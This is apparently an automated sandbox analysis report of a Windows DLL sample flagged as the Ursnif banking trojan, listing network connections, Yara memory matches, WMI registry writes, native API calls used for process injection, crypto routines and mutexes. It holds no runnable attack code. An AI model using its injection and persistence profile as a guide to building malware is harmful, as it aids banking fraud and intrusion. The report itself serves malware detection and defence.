Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49872 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49877 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.718768044.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792588340.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.910870766.000000000500C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743986098.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754576282.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743884780.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718843741.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754698141.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754769459.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921653707.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.866559376.0000000004E6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.918784964.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887362979.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754654918.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743778425.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792300169.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743828986.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792520115.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718744882.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792349818.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921759909.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744005054.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886778931.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718819209.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743935552.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792420602.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792562195.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754876807.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887204962.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718696614.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886970529.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718647612.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754836366.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.858457272.000000000564C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921808684.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.824971303.0000000001CAC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744015390.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743688599.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718721890.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887090567.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887042071.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718792278.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754897105.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887180889.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887136487.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792489565.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792387675.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754923089.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.940528675.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6632, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6560, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.718768044.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792588340.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.910870766.000000000500C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743986098.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754576282.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743884780.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718843741.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754698141.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754769459.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921653707.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.866559376.0000000004E6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.918784964.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887362979.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754654918.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743778425.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792300169.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743828986.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792520115.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718744882.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792349818.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921759909.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744005054.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886778931.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718819209.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743935552.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792420602.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792562195.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754876807.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887204962.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718696614.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886970529.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718647612.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754836366.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.858457272.000000000564C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921808684.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.824971303.0000000001CAC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744015390.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743688599.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718721890.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887090567.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887042071.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718792278.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754897105.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887180889.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887136487.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792489565.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792387675.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754923089.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.940528675.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6632, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6560, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Contains functionality to call native functions

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001996 GetProcAddress,NtCreateSection,memset,	0_2_10001996
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001A44 NtMapViewOfSection,	0_2_10001A44
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100023A5 NtQueryVirtualMemory,	0_2_100023A5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0463DDC5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	3_2_0463DDC5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0464104F RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	3_2_0464104F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_046318AC NtQueryInformationProcess,	3_2_046318AC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_046391A2 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	3_2_046391A2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04623D0F NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	3_2_04623D0F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462E5E9 NtQuerySystemInformation,RtlNtStatusToDosError,	3_2_0462E5E9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462DE4B memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	3_2_0462DE4B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462FE2C memset,NtWow64QueryInformationProcess64,GetProcAddress,	3_2_0462FE2C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462981E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	3_2_0462981E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_046259A0 NtWriteVirtualMemory,VirtualProtectEx,RtlNtStatusToDosError,SetLastError,	3_2_046259A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462F19E NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	3_2_0462F19E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04625210 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	3_2_04625210
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04622AB1 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	3_2_04622AB1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04624358 memset,NtQueryInformationProcess,	3_2_04624358
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0463B338 NtGetContextThread,RtlNtStatusToDosError,	3_2_0463B338
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462DB10 NtWow64ReadVirtualMemory64,GetProcAddress,	3_2_0462DB10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E95A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	7_2_04E95A27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E96604 GetProcAddress,NtCreateSection,memset,	7_2_04E96604
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E94E06 NtMapViewOfSection,	7_2_04E94E06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E9B1A5 NtQueryVirtualMemory,	7_2_04E9B1A5
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B1044 NtWriteVirtualMemory,	50_2_001B1044
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A846C NtAllocateVirtualMemory,	50_2_001A846C
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019F8C8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	50_2_0019F8C8
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B0CC0 NtCreateSection,	50_2_001B0CC0
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A491C NtSetContextThread,NtUnmapViewOfSection,NtClose,	50_2_001A491C
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B6218 NtMapViewOfSection,	50_2_001B6218
Source: C:\Windows\System32\control.exe	Code function: 50_2_001AB27C NtQueryInformationToken,NtQueryInformationToken,NtClose,	50_2_001AB27C
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019B3A8 NtQueryInformationProcess,	50_2_0019B3A8
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019FBEC NtReadVirtualMemory,	50_2_0019FBEC
Source: C:\Windows\System32\control.exe	Code function: 50_2_001CB002 NtProtectVirtualMemory,NtProtectVirtualMemory,	50_2_001CB002

Contains functionality to launch a process as a different user

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_046326C2 CreateProcessAsUserW,

3_2_046326C2

Detected potential crypto function

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002184	0_2_10002184
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04642D9C	3_2_04642D9C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04626F3A	3_2_04626F3A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462D2AE	3_2_0462D2AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E93EE1	7_2_04E93EE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E9888E	7_2_04E9888E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E9AF80	7_2_04E9AF80
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A491C	50_2_001A491C
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019775C	50_2_0019775C
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A1388	50_2_001A1388
Source: C:\Windows\System32\control.exe	Code function: 50_2_00193034	50_2_00193034
Source: C:\Windows\System32\control.exe	Code function: 50_2_001AD834	50_2_001AD834
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B1834	50_2_001B1834
Source: C:\Windows\System32\control.exe	Code function: 50_2_001AEC58	50_2_001AEC58
Source: C:\Windows\System32\control.exe	Code function: 50_2_001910B0	50_2_001910B0
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A58B4	50_2_001A58B4
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A54C8	50_2_001A54C8
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A04C4	50_2_001A04C4
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B10E0	50_2_001B10E0
Source: C:\Windows\System32\control.exe	Code function: 50_2_001BAD08	50_2_001BAD08
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019E158	50_2_0019E158
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A4150	50_2_001A4150
Source: C:\Windows\System32\control.exe	Code function: 50_2_00195998	50_2_00195998
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019D1B8	50_2_0019D1B8
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B1DA8	50_2_001B1DA8
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A79AC	50_2_001A79AC
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B95FC	50_2_001B95FC
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019AE04	50_2_0019AE04
Source: C:\Windows\System32\control.exe	Code function: 50_2_001AB668	50_2_001AB668
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A2A88	50_2_001A2A88
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019BA8C	50_2_0019BA8C
Source: C:\Windows\System32\control.exe	Code function: 50_2_001962DC	50_2_001962DC
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B52C8	50_2_001B52C8
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B86FC	50_2_001B86FC
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B5B1C	50_2_001B5B1C
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B9B14	50_2_001B9B14
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B8B50	50_2_001B8B50
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019EBBC	50_2_0019EBBC
Source: C:\Windows\System32\control.exe	Code function: 50_2_001ACFB4	50_2_001ACFB4
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019FFE8	50_2_0019FFE8

PE file does not import any functions

Source: rzslcw3n.dll.44.dr

Static PE information: No import functions for PE file found

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Uses 32bit PE files

Source: 2790000.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 2790000.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winDLL@82/256@56/19

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_04632517 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,

3_2_04632517

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{D216EB03-DE55-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{80E0D293-DF59-B25D-69B4-8306AD28679A}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4596:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_01
